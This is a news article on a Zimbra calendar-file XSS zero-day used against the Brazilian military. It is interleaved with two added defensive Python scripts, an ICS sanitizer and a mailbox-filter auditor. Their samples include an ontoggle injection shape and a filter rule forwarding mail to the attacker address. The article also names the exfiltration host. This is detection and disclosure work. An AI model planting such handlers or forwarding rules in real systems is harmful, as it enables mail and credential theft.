Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files

Oct 06, 2025 | Ravie Lakshmanan | Email Security / Zero-Day

A now-patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military.
Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) flaw in the Classic Web Client that arises from insufficient sanitization of HTML content in ICS calendar files, resulting in arbitrary code execution.
“When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag,” according to a description of the flaw in the NIST National Vulnerability Database (NVD).

“This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including e-mail redirection and data exfiltration.”
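The NVD description above pins the defect to one thing: HTML inside an ICS property reaching the browser with its event-handler attributes intact. The script below is an added defensive example written for this page (it is not Zimbra's code and does not come from the article or the StrikeReady report). It unfolds an ICS file, pulls out the properties a webmail client might render as HTML, flags and strips `on*` handler attributes, `javascript:` URLs and `<details>`-style tags, and returns the sanitized markup. The property list (`HTML_PROPERTIES`), the blocked-tag set and the sample invitation are assumptions constructed for the demonstration; the handler body in the sample is a placeholder, not the payload from the campaign.

```python
# Added defensive example (not Zimbra's code, not from the article or StrikeReady):
# scan the HTML carried in an ICS invitation for script-bearing markup and
# return a sanitized copy alongside the findings.
from html import escape
from html.parser import HTMLParser

# Assumption: VEVENT properties a webmail client may render as HTML.
HTML_PROPERTIES = ("X-ALT-DESC", "DESCRIPTION")
# <details> is the element named in the NVD text; the rest are classic script vectors.
BLOCKED_TAGS = {"details", "script", "iframe", "object", "embed", "svg", "math"}


def unfold_ics(text: str) -> list[str]:
    """Join RFC 5545 folded lines (continuations begin with a space or tab)."""
    lines: list[str] = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def html_values(ics_text: str) -> list[tuple[str, str]]:
    """(property, value) pairs for the properties that may carry HTML."""
    found = []
    for line in unfold_ics(ics_text):
        name, sep, value = line.partition(":")
        base = name.split(";", 1)[0].upper()  # drop ;FMTTYPE=... parameters
        if sep and base in HTML_PROPERTIES:
            # ICS text values escape newlines as \n and backslashes as \\
            found.append((base, value.replace("\\n", "\n").replace("\\\\", "\\")))
    return found


class EventHandlerAudit(HTMLParser):
    """Rebuild markup without blocked tags or on* handlers; record each removal."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []
        self.clean: list[str] = []
        self._skip_depth = 0  # > 0 while inside a blocked element

    def handle_starttag(self, tag, attrs):
        kept = []
        for key, val in attrs:
            low = key.lower()
            if low.startswith("on"):
                self.findings.append(f"event handler {key} on <{tag}>")
            elif low in ("href", "src") and (val or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {key} on <{tag}>")
            else:
                kept.append(f' {key}="{escape(val or "", quote=True)}"')
        if tag in BLOCKED_TAGS:
            self.findings.append(f"blocked tag <{tag}>")
            self._skip_depth += 1
        elif not self._skip_depth:
            self.clean.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> style tags get no closing tag
        if tag in BLOCKED_TAGS:
            self._skip_depth -= 1  # nothing to skip after a self-closing tag

    def handle_endtag(self, tag):
        if tag in BLOCKED_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
        elif not self._skip_depth:
            self.clean.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.clean.append(escape(data))


def audit_ics(ics_text: str) -> dict:
    """Scan every HTML-bearing property; report findings and the sanitized markup."""
    findings: list[str] = []
    sanitized: dict[str, str] = {}
    for prop, value in html_values(ics_text):
        parser = EventHandlerAudit()
        parser.feed(value)
        parser.close()
        findings.extend(f"{prop}: {f}" for f in parser.findings)
        sanitized[prop] = "".join(parser.clean)
    return {"malicious": bool(findings), "findings": findings, "sanitized": sanitized}


# Constructed sample (not a real capture): the HTML description carries the shape
# the NVD text describes, a <details> element with an ontoggle handler; the
# handler body is a placeholder.
SAMPLE_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "BEGIN:VEVENT",
    "SUMMARY:Protocol meeting",
    'X-ALT-DESC;FMTTYPE=text/html:<html><body><p>Agenda attached.</p>',
    ' <details ontoggle="placeholder()">x</details></body></html>',
    "END:VEVENT", "END:VCALENDAR",
])

if __name__ == "__main__":
    print(audit_ics(SAMPLE_ICS))
```

Run on a mail-gateway or on stored calendar attachments, the `findings` list is what goes to a detection rule and `sanitized` is what a client should render; the point is that dropping every `on*` attribute is far safer than trying to enumerate which handlers (`ontoggle` here) matter.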
The vulnerability was addressed by Zimbra in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5, released on January 27, 2025. The advisory, however, makes no mention of it having been exploited in real-world attacks.
According to a report published by StrikeReady Labs on September 30, 2025, the observed in-the-wild activity involved unknown threat actors spoofing the Libyan Navy’s Office of Protocol to target the Brazilian military with malicious ICS files that exploited the flaw.
The ICS file contained JavaScript code designed to act as a comprehensive data stealer, siphoning credentials, emails, contacts, and shared folders to an external server (“ffrk[.]net”). It also searches for emails in a specific folder and adds malicious Zimbra email filter rules named “Correo” to forward messages to spam_to_junk@proton.me.

To avoid detection, the script hides certain user interface elements and runs its main routine only if more than three days have passed since it last executed.
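Because the stealer persists through mailbox filter rules, the durable detection is not the script but the rule it leaves behind: a forward to an address outside the organisation. The following is an added defensive example written for this page (not Zimbra's code, not from the article or the StrikeReady report) that audits an account's exported filter rules and reports redirects to external domains, redirects to the address quoted in the article, and rules carrying the reported name. It assumes the rules are available as a Sieve script in which each rule is preceded by a `# <name>` comment and ends with a `}` on its own line; the sample export and the `example.mil` domain are constructed.

```python
# Added defensive example (not Zimbra's code, not from the article or StrikeReady):
# audit exported mailbox filter rules for forwarding outside the organisation
# or matching the indicators the article quotes.
import re
from dataclasses import dataclass

# Indicators quoted in the article: rule name and forwarding address.
KNOWN_BAD_RULE_NAMES = {"Correo"}
KNOWN_BAD_TARGETS = {"spam_to_junk@proton.me"}

# Assumption: filters are exported as a Sieve script in which the rule name is
# a "# <name>" comment directly before its "if" block, which ends at a "}" on
# its own line. Adjust the two patterns if your export looks different.
RULE_RE = re.compile(r"^#\s*(?P<name>[^\n]+?)\s*\n(?P<body>if\b.*?^\}\s*$)", re.M | re.S)
REDIRECT_RE = re.compile(r'\bredirect\b[^";]*"(?P<target>[^"]+)"')


@dataclass
class Finding:
    account: str
    rule: str
    target: str
    reason: str


def audit_sieve(account: str, sieve: str, internal_domains: set[str]) -> list[Finding]:
    """One Finding per suspicious rule or redirect in an account's Sieve script."""
    findings: list[Finding] = []
    for m in RULE_RE.finditer(sieve):
        name, body = m.group("name"), m.group("body")
        redirects = [r.group("target").strip().lower() for r in REDIRECT_RE.finditer(body)]
        if name in KNOWN_BAD_RULE_NAMES:
            findings.append(Finding(account, name, ", ".join(redirects) or "-",
                                    "rule name matches reported indicator"))
        for target in redirects:
            domain = target.rsplit("@", 1)[-1]
            if target in KNOWN_BAD_TARGETS:
                findings.append(Finding(account, name, target, "redirect to known-bad address"))
            elif domain not in internal_domains:
                findings.append(Finding(account, name, target, f"redirect to external domain {domain}"))
    return findings


# Constructed sample export for one mailbox (not a real capture).
SAMPLE_SIEVE = """\
require ["fileinto", "reject", "tag", "flag"];

# Receipts
if anyof (header :contains ["subject"] "receipt") {
    fileinto "Receipts";
    stop;
}

# Correo
if anyof (header :contains ["subject"] "urgente") {
    redirect "spam_to_junk@proton.me";
    stop;
}

# Backup copy
if allof (address :is ["from"] "ops@example.mil") {
    redirect "archive@example.mil";
    stop;
}
"""

if __name__ == "__main__":
    for f in audit_sieve("user@example.mil", SAMPLE_SIEVE, {"example.mil"}):
        print(f"{f.account}: rule '{f.rule}' -> {f.target}: {f.reason}")
```

The external-domain check is the one that keeps working after the indicators change; the name and address matches are there for this campaign specifically. Feeding every account's export through `audit_sieve` on a schedule, and alerting on any new external redirect, catches the persistence step regardless of which XSS planted it.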
It’s currently not clear who is behind the attack, but earlier this year, ESET revealed that the Russian threat actor known as APT28 had exploited XSS vulnerabilities in various webmail solutions from Roundcube, Horde, MDaemon, and Zimbra to obtain unauthorized access.
A similar modus operandi has also been adopted by other hacking groups like Winter Vivern and UNC1151 (aka Ghostwriter) to facilitate credential theft.

Source: thehackernews.com
